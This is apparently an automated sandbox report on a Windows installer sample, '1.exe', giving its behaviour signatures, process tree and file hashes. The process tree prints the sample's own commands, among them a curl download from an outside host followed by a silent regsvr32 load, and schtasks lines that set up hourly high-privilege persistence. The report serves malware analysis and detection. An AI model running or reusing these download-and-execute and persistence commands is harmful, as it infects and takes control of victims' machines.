Resubmissions

15/04/2025, 20:14

250415-yz8q5szqw5 8

08/03/2025, 02:02

250308-cf99zazxht 8

Analysis

  • max time kernel
    93s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/03/2025, 02:02

General

  • Target

    1.exe

  • Size

    32.8MB

  • MD5

    c62c1a1a3c66fb83390ece675ab76dd2

  • SHA1

    55b939abe9f03345c71f54ebe9a5f206bb64bc49

  • SHA256

    de6ed44d21e5bc9bc5c1c51f33760a5d96378308d02c2c81ef2d75e7a201fb63

  • SHA512

    b927f3bb27ae617c3a9e38bb2fecd1fc108cfa306408da657973a1e8ab3158a09b00285987acd0ef8ec14d2074d3bf485effd114ca3850ac820e01838e6a19c6

  • SSDEEP

    786432:+Fxb8yuOgT5S+u6wrqImbWtVd5l5jMvti0Jz8+aZ8J9HZhkS3gXbwHPc:+Fxb8yuOgtO6oqIXtVd5l5jMvssz8T0G

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 21 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 8 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Checks computer location settings
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4372
    • C:\Users\Admin\AppData\Local\Temp\1.exe
      "C:\Users\Admin\AppData\Local\Temp\1.exe" /i "C:\Users\Admin\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="4372" CHAINERUIPROCESSID="4372Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="F:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\1.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741158713 " TARGETDIR="F:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\1.exe" AI_INSTALL="1"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      PID:2256
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 7B7A082DE0B684599BA858A7B5A9DB6F C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4204
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:4844
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding B395CF0C25648BD7BAA014F3F21EFCCA
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:532
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 6B4D1E5CB0838F0A563D896A8316CFDD E Global\MSI0000
        2⤵
        • Downloads MZ/PE file
        • Loads dropped DLL
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        PID:3588
      • C:\Program Files (x86)\Main\MainSoftware.exe
        "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent
        2⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "GOIGNWEJ\Admin" /RL HIGHEST /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3608
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
          3⤵
            PID:5060
        • C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe
          "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://armorsecureai.com?source_id=6
          2⤵
          • Executes dropped EXE
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4212
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "InstallTask_b39632d3-ba98-45b2-81b7-f3f63c355e50" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://armorsecureai.com?source_id=6" /sc once /st 02:04:25 /ru SYSTEM /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4484
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:2872
      • C:\Program Files (x86)\Main\MainSoftware.exe
        "C:\Program Files (x86)\Main\MainSoftware.exe" Loop
        1⤵
        • Downloads MZ/PE file
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Program Files (x86)\Main\Chop\Install.exe
          "C:\Program Files (x86)\Main\Chop\Install.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4228
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4592
            • C:\Windows\system32\curl.exe
              curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\Admin\AppData\Local\Temp\207340.ocx"
              4⤵
              • Downloads MZ/PE file
              PID:5032
            • C:\Windows\system32\regsvr32.exe
              regsvr32 /s /i "C:\Users\Admin\AppData\Local\Temp\207340.ocx"
              4⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:5060
      • C:\Program Files\Surfclub\Install.exe
        "C:\Program Files\Surfclub\Install.exe" install https://armorsecureai.com?source_id=6
        1⤵
        • Executes dropped EXE
        PID:2760

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Config.Msi\e586686.rbs

              Filesize

              805KB

              MD5

              92e0de619e79560ae8fe87643ab126db

              SHA1

              45ce101a1ba46680387bd17d182b6d7550d9ba1c

              SHA256

              4db23f1f2aa69577aa6c2dbd62c80b73a9c738ba56cc56d77213a330a0034816

              SHA512

              8e51e9c93dccdd1746af13cf639610404d0c533b4d4902fc29807282fedbf8914bade98d196862c54a9340006f1b9e12b7f488df6ead39e7d887c6120b1311a6

            • C:\Program Files (x86)\Main\Chop\Install.exe

              Filesize

              1.7MB

              MD5

              675f1b648b3e8810a4a32fe32546490b

              SHA1

              e334abbe5d8b09c1bdbe69726498e61e29a3474c

              SHA256

              63fb3ed0aba87917847ad256c4e89f7b250adc6e2eac74023bb52e091ab0ef97

              SHA512

              c7f516e591ca940541b3949a8dbaad42edb9f9e67d0d10b0dc4eed9f54a1030914c8b96ad5d8d4a9776075bd858c719d6137208565d38f66834a322e593e22b5

            • C:\Program Files (x86)\Main\guid

              Filesize

              36B

              MD5

              60e0c03dfba6ccf72a3134ed07efdc7e

              SHA1

              d89cb0fe96a301c0a2a3a0a506a0bfe383a2bf7a

              SHA256

              44c247d3fc72cc0a20521e21f72a5ab881676da93ceeffa20f893eae64e0e284

              SHA512

              2292759a97048ba74f05e06fc20953dfb4f1e036c98067c9055956c584f81abcd13bbaa3cc8e1e15f59b5a819b2ec9804cf3b7712af74f42120587a70b04fba6

            • C:\Program Files\Surfclub\Install.exe

              Filesize

              11.8MB

              MD5

              e34b28f5a5d88a3ea073dab5959ef122

              SHA1

              8195e2e8a9276ef9c0a2a8cd643fc12551e7c801

              SHA256

              35a0bcc6ee9db605a7260d2db6c3e8f83259aee71496639d1b84b9cf814fd93c

              SHA512

              24ed1963a04c91fb41f8767d1b3fec08fcf34477443c5445447af53a28f652d4e7536c208bf177da4d76951435bc5c2fc1799c788ec20d71f32ffd0e1314810e

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_6245D23D66AD83C7DB623E2BA49DC07B

              Filesize

              1KB

              MD5

              7761e773fb86a28392bb1f55cc2d87df

              SHA1

              7fec1961db09de4283744714b13175c68540a2be

              SHA256

              6211e2f1e0b777776e698ccc7ac68f0d6bf4d7f0fbe4fc349dd863b957fec09c

              SHA512

              b948bd7281a6527e8726f73164cec03078c68fd43aeacdbe5468df17644408fed5abf867a6cb85735fe75d1091e5187d5890477947f34d0c79d21efebeca203e

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E

              Filesize

              1KB

              MD5

              b44abd69752f3bf385cf9216e85208c9

              SHA1

              26b5c571acb88ef7500c8225855e99009c048ed0

              SHA256

              d72b759bd2dec0dd2b99b54b6126366b1dec6a51506453c048a1e1e6c3b61363

              SHA512

              92766e9b28161ffd10ff8e42d3d78e3c29311e172bc697a500f4b0a54fb747783115bf94fb6627424383f5beeab4bab671d8e910831885000fe143bbc08777f8

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_6245D23D66AD83C7DB623E2BA49DC07B

              Filesize

              536B

              MD5

              b5af181bb914fec3341560e10923b84e

              SHA1

              445bc404ed0ac0182c74c042e12a519929d5fc79

              SHA256

              71318de6f99da03bccb177682cd619bb9a0abac3087f795aafa173d81af859fb

              SHA512

              1ed0ee622bfeadc1cbea37f9fda0a3cd19dd8e2957068fb15ba46cb51ec453033e15d6f1c4ea9a3b4bd8ff601a2e9ace8531029cf6aa2dbb97db8ece3f9cbfa5

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E

              Filesize

              536B

              MD5

              16a52bd3a2a292147e10f6122726b708

              SHA1

              a25041e700178ad637e2d674de8df2d93b5468a8

              SHA256

              22c5b7d5437c53254c7112a9cd0c2a6163788b27f2ab791402d7d96b6daf4f40

              SHA512

              86c5b884d73f93622c90292e8d0916efc551af587e56efd7e3008cf8386ce6e1fb4deee1ff7aad94c26e86988b27f063e954d82c8fd729012c231702281fd77c

            • C:\Users\Admin\AppData\Local\Packages\TBioYkjtYu\output.zip

              Filesize

              149B

              MD5

              841ccae90494c611b6a355062e6f57a1

              SHA1

              a9812a348ee82e51c34e20fb04eefc7c755bd439

              SHA256

              2688486940e4969a606151901424a406b50d13af2e2305f720f46855c49b631a

              SHA512

              54f3dbe77f8a0eac6d3947bdb2e061fab8fcaf6856172db41c5ef1cdc1ee13391df0414d51feed236626b69893514adc3a21471b11730f41d1d386215f55eedc

            • C:\Users\Admin\AppData\Local\Packages\TBioYkjtYu\p.txt

              Filesize

              41B

              MD5

              a0100e52a23ed1389371bbdec4fad41f

              SHA1

              6e6ad26782c0e5c6bcfff2d19f5400bba7891d1d

              SHA256

              f88f7f372a8f31db0903cffead682514c06fcd3bad40de183d0493ef6b83683d

              SHA512

              bdcd6b8bc94d58d13f486c0f67994947b1d456df86cd41efc48baf31ad348fe8c3e421c9fafd458851720c994c04c4212fe635ef6f39784bc8e009f44f4187e3

            • C:\Users\Admin\AppData\Local\Temp\207340.ocx

              Filesize

              2.2MB

              MD5

              d4ed7132ab92855afe00b3daacc97b73

              SHA1

              81d4f540bcc3e4e40002e2fe02f715135e62198c

              SHA256

              a2f7d83ddbe0aeba5f5113a8adf2011dc1a7393fa4fe123e74a17dbc2a702b13

              SHA512

              575e806abe18592b234c377ca5c843fcaded774c3330809de068d4011a3a341ff3e8559679294e77b17e551b43cb8a38fac25a2bb672156c12d796b911bc66d9

            • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_4372\banner.jpg

              Filesize

              4KB

              MD5

              d5a55a78cd38f45256807c7851619b7d

              SHA1

              9d8269120d1d096e9ab0192348f3b8f81f5f73d9

              SHA256

              be83c8592906fd9651634b0823a2f45abe96aae082674568944c639b5b4a95dc

              SHA512

              959e7410e3006cfef9d14315e8741e34b6e81c4f9160c5d66f3abd77ce72f55f907ab3a0e500780b5c0e0e017e8639f135cc258976b4ab4b9d1aaed6242ce9f1

            • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_4372\dialog.jpg

              Filesize

              12KB

              MD5

              5f6253cff5a8b031bfb3b161079d0d86

              SHA1

              7645b13610583fb67247c74cf5af08ff848079e7

              SHA256

              36d9bab35d1e4b50045bf902f5d42b6f865488c75f6e60fc00a6cd6f69034ab0

              SHA512

              d1fdc364bedf931512000fbf05e854d5aceccb48abb9ec49e68476a5dc2907267490290d92acbb267ffb7bdba9b7a1c88f1eb77830cf953443f4624995dabdc3

            • C:\Users\Admin\AppData\Local\Temp\MSID88E.tmp

              Filesize

              1019KB

              MD5

              2330ebbe491c6026af5e8853f3692798

              SHA1

              6c62d81f6c90046714705bec931815a908b760ac

              SHA256

              15c35c5abf7bab8d1375f5622e31da14fd027ae1046b8a6ddfd74263fa34eda6

              SHA512

              81747ead7869f68e499a53537588d35485b5fd2b4505856cd589bca1f7296d971e78f3fd57a1c1d931dfe6c2668888b26eff49a96ecd740ecd1b271eb7058201

            • C:\Users\Admin\AppData\Local\Temp\MSIDA76.tmp

              Filesize

              1.2MB

              MD5

              c9ef0378879c57a38c075bb28b88fcab

              SHA1

              dd27d17d691ffddaadd8bd6de532bc9f8b2c4a3e

              SHA256

              6e7cdab18e1f705c0ea56a565577db0389ece2b5a4e0f31d3063e9103f59fbee

              SHA512

              94cca46aafe7138904a79693e0c97e0d72a0542e4d7a8a6778b4d4f0e68aa3dd90e7dbc0b34832a8875b10f32c3ca2bbaab446da0689c74ca295af4490c6783f

            • C:\Users\Admin\AppData\Local\Temp\shi363E.tmp

              Filesize

              4.8MB

              MD5

              77d6c08c6448071b47f02b41fa18ed37

              SHA1

              e7fdb62abdb6d4131c00398f92bc72a3b9b34668

              SHA256

              047e2df9ccf0ce298508ee7f0db0abcb2ff9cff9916b6e8a1fbd806b7a9d064b

              SHA512

              e1aeb8e8b441d755a119f45a465ca5660678f4131984322252bfb6d2cec52e7ee54d65a64b98429b23915eb5707b04b5cd62a85446c60de8842314130a926dbd

            • C:\Users\Admin\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exe

              Filesize

              21.9MB

              MD5

              9a55270c8c060189f9f805eb78aceb1b

              SHA1

              3554089f1efb186ffe2074b0fa742d7fad729c94

              SHA256

              c0a814eecae4e5b4b295f14e4fcfb49c7cedf47616aa5a1b068de42272f4976a

              SHA512

              cdeb93f4f7f441f8b56d43a55ce64b0d5c193cf62808c9720bde4387ae42de61570773174243a8ed81810e306ba5a378d514737753c902ac40f7404b5faaa679

            • C:\Users\Admin\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi

              Filesize

              4.8MB

              MD5

              56a5716faacdcca11c8c591e3dff1b47

              SHA1

              789c8af322a2fc0ef0954e4bd71371a3b35e9faa

              SHA256

              764a0be5234b3f43fc154ea4d1c0122218aa61930da54ec5ff53eb5a5bb5a184

              SHA512

              aacddbe016d1e706212b60c982fffdf7bcffb953b5ddd489c371b897b7730198f836a87bcabf55ce909557b168d65fcc8d73b3cef0f52739bcc8fed428f34204

            • C:\Users\Admin\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txt

              Filesize

              1KB

              MD5

              97032e3e23da2270acae45bff354cfa4

              SHA1

              179a18369935600dba94d2bcf702629bae554187

              SHA256

              e8867a5166177e6ef833d079ce4e9e53a4ca6866ba6f9e4ed5a7a04260d4541c

              SHA512

              9f906f9d683d110a851475993b50b9a3619ae9b2b51b1fde3674bbd23a9d3f0f7b26961f473fd885a28e4b8d4631e5dbe3c6529ad52f2e1cc00762649b8ec09b

            • C:\Windows\Installer\MSI6A03.tmp

              Filesize

              917KB

              MD5

              afa8190a561a082dcc094e9ff8abdb4a

              SHA1

              3817097816d20ccbe8754e6c58bbbde937af9a20

              SHA256

              0fa9b28d3bb8e455ad61735f5259d5d9b8f65bcefa44f83f69db8a4ca451e5bd

              SHA512

              3deb8f142dc287246ab17cf45c1c501ffe39cd1e089d6b6d90cac8d958f873764615cdaf37be08cda19bc8354ca9ee94a8518d425802d3a289ea74a364a0f952

            • C:\Windows\Installer\MSI76B7.tmp

              Filesize

              423KB

              MD5

              18cda9f5769af8d162f93889de623514

              SHA1

              cbb2d0ef2baa765715c67fcd9766f2fea3af1fa8

              SHA256

              eb21efa033f38f24d87c1c259055a2618168268881be6ae06d734450fdf65f82

              SHA512

              bcca4f6dd4acf4a61b36ce5ad058c15535812de7362950959ff0373352b640fc8121b64523be6fc785aa603fe3441fce8a8b589a7ef9b11838eca6ff9b24cc2e

            • C:\Windows\Installer\MSI7773.tmp

              Filesize

              802KB

              MD5

              2f174a6c622589a51af61c9957e09065

              SHA1

              f2a83b9f590abf81ba5fe783ceda905d544b36e8

              SHA256

              2376cc8c06232e3346e97f1ff01d208ea65f181ddeb9d616bed193a96a879087

              SHA512

              eaedaa752ae36d91d6c543ccf89c82701f36cd65e6e6a6477f8fd3f45e4c0fa5c62a04c21c4d2fa621fad09c30877f4adeb33e5fea15b277f8b01bd1b41429fd

            • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

              Filesize

              24.1MB

              MD5

              da7778bb01aa6e1561d7be31931b5a29

              SHA1

              1962fc5d87e482587c87b394686cedc4a533134f

              SHA256

              73b8aa8b92be42b3f5dbab7dea75ed03c3199be828be9746c9cf6146bfc1e8ce

              SHA512

              ed6ad7a94c7f43e84be446cf1855978ea5bdb097a816b33c3a3bcf7d4d97c1b99e75c5d3224eb13ee0c678ef2974f319bee17f578a6c5112115c2f62b1b6b54e

            • \??\Volume{241ef5c9-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c23cbea9-10cf-4b54-9f84-80e2d09283e1}_OnDiskSnapshotProp

              Filesize

              6KB

              MD5

              9f2994d62e9691d8cbb33293ec684944

              SHA1

              68640d23070be00cbd7b6bf2c1cfec8f23af36d8

              SHA256

              5027c12743f8c9103078a8d05e6ea7986464ea0e4344b16d6f479d3661b5f3aa

              SHA512

              74a0d4ff9006ea9c55a894852e53544b33ecba781430d97e156fdc038dc27822f3a42b460c5dc97554c66ece069e6ab2b76b8986f35c5bfda5e81a13c92c60ee